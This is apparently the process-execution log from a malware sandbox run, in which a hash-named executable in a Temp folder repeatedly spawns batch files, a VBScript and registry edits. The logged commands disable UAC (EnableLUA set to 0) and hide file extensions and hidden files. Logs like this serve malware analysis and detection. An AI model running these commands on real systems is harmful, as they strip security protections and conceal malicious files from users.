reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jCUMQIgE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tuMwYEsA.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv wZhl4Ag/GkuhwUoRO0W+GA.0.2

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lcgAQEIo.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kmQwEsEw.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GmcwEgQw.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AIsQskcI.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nmYogMEI.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XYgggEck.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TyAMIMUQ.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dwcAgwwo.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IikMcQoY.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KUEssAUI.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CicMQccw.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\raAoQgIM.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BcMQcMck.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JiAcAkQY.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yYEQckcU.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AOMQMMMY.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kSoMwwwo.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

